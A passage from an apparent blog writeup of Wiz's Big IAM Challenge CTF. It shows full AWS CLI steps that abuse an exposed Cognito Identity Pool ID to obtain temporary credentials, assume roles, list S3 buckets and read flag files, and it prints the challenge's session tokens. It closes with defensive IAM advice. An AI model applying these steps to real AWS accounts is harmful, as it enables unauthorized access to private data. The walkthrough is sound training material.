class="o">&gt;</span>&lt;Name&gt;thebigiamchallenge-admin-storage-abf1321&lt;/Name&gt;&lt;Prefix&gt;files/&lt;/Prefix&gt;&lt;Marker&gt;&lt;/Marker&gt;&lt;MaxKeys&gt;1000&lt;/MaxKeys&gt;&lt;IsTruncated&gt;false&lt;/IsTruncated&gt;&lt;Contents&gt;&lt;Key&gt;files/flag-as-admin.txt&lt;/Key&gt;&lt;LastModified&gt;2023-06-07T19:15:43.000Z&lt;/LastModified&gt;&lt;ETag&gt;<span class="s2">"e365cfa7365164c05d7a9c209c4d8514"</span>&lt;/ETag&gt;&lt;Size&gt;42&lt;/Size&gt;&lt;StorageClass&gt;STANDARD&lt;/StorageClass&gt;&lt;/Contents&gt;&lt;Contents&gt;&lt;Key&gt;files/logo-admin.png&lt;/Key&gt;&lt;LastModified&gt;2023-06-08T19:20:01.000Z&lt;/LastModified&gt;&lt;ETag&gt;<span class="s2">"c57e95e6d6c138818bf38daac6216356"</span>&lt;/ETag&gt;&lt;Size&gt;81889&lt;/Size&gt;&lt;StorageClass&gt;STANDARD&lt;/StorageClass&gt;&lt;/Contents&gt;&lt;/ListBucketResult&gt; </code></pre> </div> <p>He-he, there it is. Here are the droids I’m looking for!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws s3 <span class="nb">cp </span>s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - | <span class="nb">cat</span> <span class="o">{</span>wiz:principal-arn-is-not-what-you-think<span class="o">}</span> </code></pre> </div> <p>Challenge 4 is complete.</p> <h2> Challenge 5: Do I know you? </h2> <blockquote> <p><strong>Task</strong><br> We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">IAM</span><span class="w"> </span><span class="err">policy</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"VisualEditor0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"mobileanalytics:PutEvents"</span><span class="p">,</span><span class="w"> </span><span class="s2">"cognito-sync:*"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"VisualEditor1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"s3:GetObject"</span><span class="p">,</span><span class="w"> </span><span class="s2">"s3:ListBucket"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"arn:aws:s3:::wiz-privatefiles"</span><span class="p">,</span><span class="w"> </span><span class="s2">"arn:aws:s3:::wiz-privatefiles/*"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Okay, let’s dissect what we have here. First things first, <code>cognito-sync:*</code> is our way to the contents of the bucket mentioned in the second statement of the policy. I feel like <code>mobileanalytics:PutEvents</code> is a bit misleading here and may not prove useful, but we’ll see. There’s also a picture of AWS Cognito in this task, which is unusual. Perhaps it’s also a clue? Let’s inspect the code.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;img</span> <span class="na">style=</span><span class="s">"width: 16rem"</span> <span class="na">id=</span><span class="s">"signedImg"</span> <span class="na">class=</span><span class="s">"mx-auto mt-4"</span> <span class="na">src=</span><span class="s">"#"</span> <span class="na">alt=</span><span class="s">"Signed img from S3"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"https://sdk.amazonaws.com/js/aws-sdk-2.719.0.min.js"</span><span class="nt">&gt;&lt;/script&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nx">AWS</span><span class="p">.</span><span class="nx">config</span><span class="p">.</span><span class="nx">region</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">us-east-1</span><span class="dl">'</span><span class="p">;</span> <span class="nx">AWS</span><span class="p">.</span><span class="nx">config</span><span class="p">.</span><span class="nx">credentials</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">AWS</span><span class="p">.</span><span class="nc">CognitoIdentityCredentials</span><span class="p">({</span><span class="na">IdentityPoolId</span><span class="p">:</span> <span class="dl">"</span><span class="s2">us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b</span><span class="dl">"</span><span class="p">});</span> <span class="c1">// Set the region</span> <span class="nx">AWS</span><span class="p">.</span><span class="nx">config</span><span class="p">.</span><span class="nf">update</span><span class="p">({</span><span class="na">region</span><span class="p">:</span> <span class="dl">'</span><span class="s1">us-east-1</span><span class="dl">'</span><span class="p">});</span> <span class="nf">$</span><span class="p">(</span><span class="nb">document</span><span class="p">).</span><span class="nf">ready</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">s3</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">AWS</span><span class="p">.</span><span class="nc">S3</span><span class="p">();</span> <span class="nx">params</span> <span class="o">=</span> <span class="p">{</span> <span class="na">Bucket</span><span class="p">:</span> <span class="dl">'</span><span class="s1">wiz-privatefiles</span><span class="dl">'</span><span class="p">,</span> <span class="na">Key</span><span class="p">:</span> <span class="dl">'</span><span class="s1">cognito1.png</span><span class="dl">'</span><span class="p">,</span> <span class="na">Expires</span><span class="p">:</span> <span class="mi">60</span> <span class="o">*</span> <span class="mi">60</span> <span class="p">}</span> <span class="nx">signedUrl</span> <span class="o">=</span> <span class="nx">s3</span><span class="p">.</span><span class="nf">getSignedUrl</span><span class="p">(</span><span class="dl">'</span><span class="s1">getObject</span><span class="dl">'</span><span class="p">,</span> <span class="nx">params</span><span class="p">,</span> <span class="nf">function </span><span class="p">(</span><span class="nx">err</span><span class="p">,</span> <span class="nx">url</span><span class="p">)</span> <span class="p">{</span> <span class="nf">$</span><span class="p">(</span><span class="dl">'</span><span class="s1">#signedImg</span><span class="dl">'</span><span class="p">).</span><span class="nf">attr</span><span class="p">(</span><span class="dl">'</span><span class="s1">src</span><span class="dl">'</span><span class="p">,</span> <span class="nx">url</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <p>Yep, there it is -- a very helpfully placed Cognito Identity Pool ID. Let’s use it to obtain our ID:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws cognito-identity get-id <span class="nt">--identity-pool-id</span> us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b <span class="o">{</span> <span class="s2">"IdentityId"</span>: <span class="s2">"us-east-1:157d6171-eee2-cf0f-f29f-f684025c7f2c"</span> <span class="o">}</span> </code></pre> </div> <p>And with this ID, we are able to obtain credentials to assume!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws cognito-identity get-credentials-for-identity <span class="nt">--identity-id</span> us-east-1:157d6171-eee2-cf0f-f29f-f684025c7f2c <span class="o">{</span> <span class="s2">"IdentityId"</span>: <span class="s2">"us-east-1:157d6171-eee2-cf0f-f29f-f684025c7f2c"</span>, <span class="s2">"Credentials"</span>: <span class="o">{</span> <span class="s2">"AccessKeyId"</span>: <span class="s2">"ASIARK7LBOHXHAHYXG4C"</span>, <span class="s2">"SecretKey"</span>: <span class="s2">"i1sxDh5obFEGzMpIw3s+nGgPfnuD3vdDjlqhMakW"</span>, <span class="s2">"SessionToken"</span>: <span class="s2">"IQoJb3JpZ2luX2VjEPz//////////wEaCXVzLWVhc3QtMSJGMEQCIE086qWoZ18m8+iEw11NGcawCIbwmxfXZXjaZbYNgBaRAiB3OJLgI1X5v72NTDiOfcwDnZOMGwNO2ZtMte9Ff1fSIiq7BQil// ////////8BEAAaDDA5MjI5Nzg1MTM3NCIMq3db2mZPg5GWhCfGKo8F8o8rTZPXKSTgtByx2JcB93zlqEEJw2zWzF61O6App4FMY8Jrhh9YAbTDR4meOt32FOnPiDKEG5Tko6rmeRwunwxFVXtEIrg1TVhaTLVuyViePLOXJYnrwIpRN7U1WlQSYIx3lRuXIEG5Gm48H51iaz+YBhcYO8CHpidqQBnBAyoMmFaZK/liuokGjufsmj9Rc6/kInC/F+gat7fyycHICZbYHzYgpSagP44NVNqTlMqW8dWZeBN04X05MEHxeZuP7LNNmEIuiCEBFTyxtDQTweK5nfySFXJUK8EWjdehgGzP3lPZIdbRadXrXVjgSbRK9CZtYIiCoKsiIhyJ+pGoY+U41y03nHbQVsAGyadEMWqxyO48ij5aCsl9Q8Sn8VPmzUGYb02WqT8TpMmPmGpxzb1SrMXpBcI9yfmT0afS7HeGIcbtrNdGx+pPZEBEfwAutGFjgRm2IgkH5pCwfWQT1/9vlAGeYSxPg+4vHyd/e/lSRptaGSlVqBZR+ayMUTxDYnCu8PR3BNHhf+RHs2GNCc8V5e+rFpmy2dpoFAaW90OMJn56V0m41FtU1UGqB26Ma8eWKgvtokHAK6OIxyZqvN7u24NKkp9u7EvZ44VX1ztU4eHNNK/fpoVWzeS48t9XImM6ImebAMVV/9HOyYVSRUoV5+vsLlAbYt2yDW82DPAd6wOELBez9XsP3NDwK4gPA13SX/7lx0MqsToWihcVXpPE891wVwouyAQj4oJy2QzocD88saqcJLnlDmUJeXsROAdDdpOl0RyG73xmxjOeycF2ebBfccaMW9sfbCj+v9vwQXlccB+Y1E6yy7rv4m5WVqZZiWkR69sk6ugyONSP5UAHdcwT+lUIudYibF5PcDCW8vzABjrdAkXktLCIeiuItjYDiKf93U9aSD9E539EfMuyaNIkL838BFEwYQneudtHjWUZ3MNZNNr7gTVmkZpjP5tvYkzYP42FLkdP0lU4uhnY7+wb1X1MhLz5g2Ff0HM1vQi+s63a1ow5zb+njOoZ2NDcMM3qpn4u8tyHK1Sw1IJPYLGLfk7OtkI3wVl3rhUIeObVMDWC7Q72xaqeSkPnjqAwXGmVVpxhmqha5FC4XInhwOUtPMhL5iFla6ZLA1lD1edv/ZD9ger1dppUUK7wXonpX+pIhv9IXWIt0JSzQRaju9Cy4Ou6m6Fs4LqHyk/cnGZb+4lslVgPotKf5LeHqKMMO0UOCvtw7KQoGlg7EDwTUMhy8uIwsCMZXTnJNoPaN526s10V6OlwYLc3MBO97dZbfmvZ4juFsgNdDrbCbNHVWHxUyms+elD/KvbrM47aXX2r1IGPexDvtmSwqwCBvVv7WPw="</span>, <span class="s2">"Expiration"</span>: 1746880294.0 <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>I can't help but enjoy this amazing loophole left for us to find. Damn, I love these challenges.</p> <p>With the help of the provided credentials, we will be able to assume a role. However, we won't be able to do that in the web CLI on the challenge page -- we'll have to use our own terminal.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span><span class="nb">export </span><span class="nv">AWS_ACCESS_KEY_ID</span><span class="o">=</span>ASIARK7LBOHXHAHYXG4C <span class="nv">$ </span><span class="nb">export </span><span class="nv">AWS_SECRET_ACCESS_KEY</span><span class="o">=</span>i1sxDh5obFEGzMpIw3s+nGgPfnuD3vdDjlqhMakW <span class="nv">$ </span><span class="nb">export </span><span class="nv">AWS_SESSION_TOKEN</span><span class="o">=</span>IQoJb3JpZ2luX2VjEPz//////////wEaCXVzLWVhc3QtMSJGMEQCIE086qWoZ18m8+iEw11NGcawCIbwmxfXZXjaZbYNgBaRAiB3OJLgI1X5v72NTDiOfcwDnZOMGwNO2ZtMte9Ff1fSIiq7BQil//////////8BEAAaDDA5MjI5Nzg1MTM3NCIMq3db2mZPg5GWhCfGKo8F8o8rTZPXKSTgtByx2JcB93zlqEEJw2zWzF61O6App4FMY8Jrhh9YAbTDR4meOt32FOnPiDKEG5Tko6rmeRwunwxFVXtEIrg1TVhaTLVuyViePLOXJYnrwIpRN7U1WlQSYIx3lRuXIEG5Gm48H51iaz+YBhcYO8CHpidqQBnBAyoMmFaZK/liuokGjufsmj9Rc6/kInC/F+gat7fyycHICZbYHzYgpSagP44NVNqTlMqW8dWZeBN04X05MEHxeZuP7LNNmEIuiCEBFTyxtDQTweK5nfySFXJUK8EWjdehgGzP3lPZIdbRadXrXVjgSbRK9CZtYIiCoKsiIhyJ+pGoY+U41y03nHbQVsAGyadEMWqxyO48ij5aCsl9Q8Sn8VPmzUGYb02WqT8TpMmPmGpxzb1SrMXpBcI9yfmT0afS7HeGIcbtrNdGx+pPZEBEfwAutGFjgRm2IgkH5pCwfWQT1/9vlAGeYSxPg+4vHyd/e/lSRptaGSlVqBZR+ayMUTxDYnCu8PR3BNHhf+RHs2GNCc8V5e+rFpmy2dpoFAaW90OMJn56V0m41FtU1UGqB26Ma8eWKgvtokHAK6OIxyZqvN7u24NKkp9u7EvZ44VX1ztU4eHNNK/fpoVWzeS48t9XImM6ImebAMVV/9HOyYVSRUoV5+vsLlAbYt2yDW82DPAd6wOELBez9XsP3NDwK4gPA13SX/7lx0MqsToWihcVXpPE891wVwouyAQj4oJy2QzocD88saqcJLnlDmUJeXsROAdDdpOl0RyG73xmxjOeycF2ebBfccaMW9sfbCj+v9vwQXlccB+Y1E6yy7rv4m5WVqZZiWkR69sk6ugyONSP5UAHdcwT+lUIudYibF5PcDCW8vzABjrdAkXktLCIeiuItjYDiKf93U9aSD9E539EfMuyaNIkL838BFEwYQneudtHjWUZ3MNZNNr7gTVmkZpjP5tvYkzYP42FLkdP0lU4uhnY7+wb1X1MhLz5g2Ff0HM1vQi+s63a1ow5zb+njOoZ2NDcMM3qpn4u8tyHK1Sw1IJPYLGLfk7OtkI3wVl3rhUIeObVMDWC7Q72xaqeSkPnjqAwXGmVVpxhmqha5FC4XInhwOUtPMhL5iFla6ZLA1lD1edv/ZD9ger1dppUUK7wXonpX+pIhv9IXWIt0JSzQRaju9Cy4Ou6m6Fs4LqHyk/cnGZb+4lslVgPotKf5LeHqKMMO0UOCvtw7KQoGlg7EDwTUMhy8uIwsCMZXTnJNoPaN526s10V6OlwYLc3MBO97dZbfmvZ4juFsgNdDrbCbNHVWHxUyms+elD/KvbrM47aXX2r1IGPexDvtmSwqwCBvVv7WPw<span class="o">=</span> <span class="nv">$ </span>aws sts get-caller-identity <span class="o">{</span> <span class="s2">"UserId"</span>: <span class="s2">"AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials"</span>, <span class="s2">"Account"</span>: <span class="s2">"092297851374"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"</span> <span class="o">}</span> <span class="nv">$ </span>aws s3 <span class="nb">ls </span>s3://wiz-privatefiles/ 2023-06-05 21:42:27 4220 cognito1.png 2023-06-05 15:28:35 37 flag1.txt <span class="nv">$ </span>aws s3 <span class="nb">cp </span>s3://wiz-privatefiles/flag1.txt - | <span class="nb">cat</span> <span class="o">{</span>wiz:incognito-is-always-suspicious<span class="o">}</span> </code></pre> </div> <p>Oh boy, I couldn’t agree more. A very fun and very interesting challenge done. Let’s finish the final one!</p> <h2> Challenge 6: One final push </h2> <blockquote> <p><strong>Task</strong><br> Anonymous access no more. Let's see what can you do now.<br> Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">IAM</span><span class="w"> </span><span class="err">policy</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Federated"</span><span class="p">:</span><span class="w"> </span><span class="s2">"cognito-identity.amazonaws.com"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sts:AssumeRoleWithWebIdentity"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringEquals"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"cognito-identity.amazonaws.com:aud"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The provided AWS policy is like telling us: "Hey, there's a quite specific action that you can use!" And use it, we will. Same as before, using the Identity Pool ID, we will obtain our Identity ID.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws cognito-identity get-id <span class="nt">--identity-pool-id</span> us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b <span class="o">{</span> <span class="s2">"IdentityId"</span>: <span class="s2">"us-east-1:157d6171-eea6-c0da-14bd-11c12678c1a8"</span> <span class="o">}</span> </code></pre> </div> <p>With the Identity ID, we are now able to get an OpenID token, since we can't just assume any role with STS and need to use web identity. Hence, OpenID token.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws cognito-identity get-open-id-token <span class="nt">--identity-id</span> us-east-1:157d6171-eea6-c0da-14bd-11c12678c1a8 <span class="o">{</span> <span class="s2">"IdentityId"</span>: <span class="s2">"us-east-1:157d6171-eea6-c0da-14bd-11c12678c1a8"</span>, <span class="s2">"Token"</span>: <span class="s2">"eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVhNi1jMGRhLTE0YmQtMTFjMTI2NzhjMWE4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDY4Nzg0NTksImlhdCI6MTc0Njg3Nzg1OX0.jLAQFCKrh5uYs-FO89P8LTmHsNRaySNWAhCDNE4N5PxSUu3AuduCbuYUVXrCcvflUPhJvePb2cTk2cM1K431ZtKqP1gWJ8XL0BW6M_JO2jHXftuWnTHeqvDuca36uTAOMJ5Vk62Fm_2OSgeWoLGgqT4WolhuRZa4nn0evuKtuHK1omEKnPsymKhUsqHw45mCdZ177XT5QCry2eiOielY3niTt7x137j_E739eP6x0tbXFMgpHTvxKFIkaQOhBn0A-1tDjZ5WlQeT5qbioOaAVK5xAjAfJeQOpZ8AZPr-H0aC9OCCN-_zNGgil31DAzFTWhAtjYevvdN9RkaIsW_PdQ"</span> <span class="o">}</span> </code></pre> </div> <p>And now, with this nice JWT (JSON Web Token), we would be able to assume the role the challenge is telling us to assume.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>aws sts assume-role-with-web-identity <span class="nt">--web-identity-token</span> eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVhNi1jMGRhLTE0YmQtMTFjMTI2NzhjMWE4IiwiYXVkIjoidXMtZWFzdC0xOmI3M 2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDY4Nzg0NTksImlhdCI6MTc0Njg3Nzg1OX0.jLAQFCKrh5uYs-FO89P8LTmHsNRaySNWAhCDNE4N5PxSUu3A uduCbuYUVXrCcvflUPhJvePb2cTk2cM1K431ZtKqP1gWJ8XL0BW6M_JO2jHXftuWnTHeqvDuca36uTAOMJ5Vk62Fm_2OSgeWoLGgqT4WolhuRZa4nn0evuKtuHK1omEKnPsymKhUsqHw45mCdZ177XT5QCry2eiOielY3niTt7x137j_E739eP6x0tbXFMgpHTvxKFIkaQOhBn0A-1tDjZ5WlQeT5qbioOaAVK5xAjAfJeQ OpZ8AZPr-H0aC9OCCN-_zNGgil31DAzFTWhAtjYevvdN9RkaIsW_PdQ <span class="nt">--role-arn</span> arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role <span class="nt">--role-session-name</span> HelloThere <span class="o">{</span> <span class="s2">"Credentials"</span>: <span class="o">{</span> <span class="s2">"AccessKeyId"</span>: <span class="s2">"ASIARK7LBOHXPDT2U3BW"</span>, <span class="s2">"SecretAccessKey"</span>: <span class="s2">"CiOKsQIiMBxy3Hav5bQ230c13pycH6vrqmcVp14s"</span>, <span class="s2">"SessionToken"</span>: <span class="s2">"FwoGZXIvYXdzEA0aDJQmv03JEKnQKp8OwCKiAk5V5ehu5IvKBGyZTVERUCaEwt8iHA7bTp2RYKfl0JNwJCxVA0bNDccjD1skSmwmfwb2H67nrKnOsj8zHrJuVXZf32XPfMni+k9tZZaw/i+18JYaZiFA/5ytPcTVg0aVQN9EpcOOvKBrWGytoya0AA3ynJTgDHAGWSljN+oIjoJQa4/ProQFye5e1Kfs6Ueh2Q31KWtBb5U4sEUlUZGTmNdoM4Zy2L9WUNjNzbpBoi2U9NhTWzORFcVRO2Y3d9p+FoqzAZIlKSyaN5cY0RTkNZYizpHgehgdrRPphU/mVjHlPhWkOn8MjT44ajwS8SJ7Tn9KqnMzBkuXa54vpm4EptngDuTVt5Z50QVZ72qCxRkz38jeTfGOe4zRPXCRXfM9oUkeKOT8/MAGMpYBjbShpAGWcCSp4q6/iJEZRRXcYOD71POGmAR1FTZkUnofAYIc/Yl4/ptWnJK1uc9nfJnUUd49yR1oSsrZGb+HtH5o1ZCql6iT7OPiYogeAbX97tbqq4nxM0qQ679+m61vpmQWvFgm//JHfN8iOGLPAZtB19zE2BzBl+sV20oedFd47J8JtbN4e1FJUGQSiYO5YiolhHuP"</span>, <span class="s2">"Expiration"</span>: <span class="s2">"2025-05-10T12:54:12+00:00"</span> <span class="o">}</span>, <span class="s2">"SubjectFromWebIdentityToken"</span>: <span class="s2">"us-east-1:157d6171-eea6-c0da-14bd-11c12678c1a8"</span>, <span class="s2">"AssumedRoleUser"</span>: <span class="o">{</span> <span class="s2">"AssumedRoleId"</span>: <span class="s2">"AROARK7LBOHXASFTNOIZG:HelloThere"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/HelloThere"</span> <span class="o">}</span>, <span class="s2">"Provider"</span>: <span class="s2">"cognito-identity.amazonaws.com"</span>, <span class="s2">"Audience"</span>: <span class="s2">"us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"</span> <span class="o">}</span> <span class="nv">$ </span><span class="nb">export </span><span class="nv">AWS_ACCESS_KEY_ID</span><span class="o">=</span>ASIARK7LBOHXPDT2U3BW <span class="nv">$ </span><span class="nb">export </span><span class="nv">AWS_SECRET_ACCESS_KEY</span><span class="o">=</span>CiOKsQIiMBxy3Hav5bQ230c13pycH6vrqmcVp14s <span class="nv">$ </span><span class="nb">export </span><span class="nv">AWS_SESSION_TOKEN</span><span class="o">=</span>FwoGZXIvYXdzEA0aDJQmv03JEKnQKp8OwCKiAk5V5ehu5IvKBGyZTVERUCaEwt8iHA7bTp2RYKfl0JNwJCxVA0bNDccjD1skSmwmfwb2H67nrKnOsj8zHrJuVXZf32XPfMni+k9tZZaw/i+18JYaZiFA/5ytPcTVg0aVQN9EpcOOvKBrWGytoya0AA3ynJTgDHAGWSljN+oIjoJQa4/ProQFye5e1Kfs6Ueh2Q31KWtBb5U4sEUlUZGTmNdoM4Zy2L9WUNjNzbpBoi2U9NhTWzORFcVRO2Y3d9p+FoqzAZIlKSyaN5cY0RTkNZYizpHgehgdrRPphU/mVjHlPhWkOn8MjT44ajwS8SJ7Tn9KqnMzBkuXa54vpm4EptngDuTVt5Z50QVZ72qCxRkz38jeTfGOe4zRPXCRXfM9oUkeKOT8/MAGMpYBjbShpAGWcCSp4q6/iJEZRRXcYOD71POGmAR1FTZkUnofAYIc/Yl4/ptWnJK1uc9nfJnUUd49yR1oSsrZGb+HtH5o1ZCql6iT7OPiYogeAbX97tbqq4nxM0qQ679+m61vpmQWvFgm//JHfN8iOGLPAZtB19zE2BzBl+sV20oedFd47J8JtbN4e1FJUGQSiYO5YiolhHuP <span class="nv">$ </span>aws sts get-caller-identity <span class="o">{</span> <span class="s2">"UserId"</span>: <span class="s2">"AROARK7LBOHXASFTNOIZG:HelloThere"</span>, <span class="s2">"Account"</span>: <span class="s2">"092297851374"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/HelloThere"</span> <span class="o">}</span> <span class="nv">$ </span>aws s3 <span class="nb">ls </span>2024-06-06 08:21:35 challenge-website-storage-1fa5073 2024-06-06 10:25:59 payments-system-cd6e4ba 2023-06-04 19:07:29 tbic-wiz-analytics-bucket-b44867f 2023-06-05 15:07:44 thebigiamchallenge-admin-storage-abf1321 2023-06-04 18:31:02 thebigiamchallenge-storage-9979f4b 2023-06-05 15:28:31 wiz-privatefiles 2023-06-05 15:28:31 wiz-privatefiles-x1000 <span class="nv">$ </span>aws s3 <span class="nb">ls </span>s3://wiz-privatefiles-x1000 2023-06-05 21:42:27 4220 cognito2.png 2023-06-05 15:28:35 40 flag2.txt <span class="nv">$ </span>aws s3 <span class="nb">cp </span>s3://wiz-privatefiles-x1000/flag2.txt - | <span class="nb">cat</span> <span class="o">{</span>wiz:open-sesame-or-shell-i-say-openid<span class="o">}</span> </code></pre> </div> <p>And this is it. The final challenge is done. Congratulations!</p> <h2> Post Mortem </h2> <p>I had a great time solving these challenges (unless I didn’t). They were fun, but at the same time complex and deceptive..</p> <p>Truth be told, some scenarios I was able to solve only with the help of guides from the internet. Only while writing this article did I realize that the image in challenge #5 was actually a clue and not a random picture. Because of this oversight, I had no idea where to look for the Identity Pool ID, so I had to google for a clue. Turns out it was right there all the time -- I just wasn’t bright enough to connect the dots.</p> <p>But fun aside, all of these challenges represent possible ways an attacker can extract helpful tips, even from the most innocent pieces of information -- like IAM policies. For example, leaving <code>*</code> in the <code>Principal</code> field allows any actor to subscribe to our queue. And I mean <em>any</em> -- including unintended actors.</p> <p>Another interesting example of possible loopholes is limiting allowed actions to only <code>s3:GetObject</code> for all actors. It sounds quite safe, right? How can you get a file you don’t know the name or location of? Turns out, there are ways, thanks to the HTTP endpoints and the <code>?prefix=</code> parameter.</p> <p>And my favorite example of how a malicious actor can follow the breadcrumbs is the leftover of a single ID -- and how it can lead to a full-scale breach of a secured perimeter, compromising sensitive data.</p> <p>Learning best practices for keeping your AWS infrastructure secure in theory is one thing. Actually seeing how even the tiniest misconfigurations can lead to a disaster -- that’s totally another. And I love it.</p> <p>Finally, to address the elephant in the room, let’s wrap this article with the most important statements regarding AWS IAM policies:</p> <ul> <li>Always specify access to certain actions for specific resources and dedicated principals: never leave wildcard permissions anywhere.</li> <li>Separate the open perimeter and closed perimeter of your infrastructure, and restrict access only to assigned individuals.</li> <li>Create alerts to notify you when a user from a certain group is trying to perform an unusual action -- and is trying it repeatedly.</li> <li>Prioritize temporary credentials assignment instead of perpetual access keys. Access keys should only be used by automated workflows (though even this is a bad practice) and should be rotated regularly. Luckily, automation doesn’t complain if you’re asking it to change the password every month.</li> </ul> <p>Stay secure.</p> <ol> <li id="fn1"> <p>The biggest challenge turned out to be hand-drawing the title picture on a tiny iphone screen. ↩</p> </li> </ol> aws ctf iam CI/CD guide: store Playwright test results in AWS S3 Kirill Mon, 05 May 2025 10:05:45 +0000 https://dev.to/aws-builders/cicd-guide-store-playwright-test-results-in-aws-s3-g62 https://dev.to/aws-builders/cicd-guide-store-playwright-test-results-in-aws-s3-g62 <h2> Intro </h2> <p>Modern software development is deeply intertwined with software testing. Unit tests, integration tests, end-to-end tests — without them, we would spend much more time fixing trivial bugs instead of actually developing software. One of the most complex 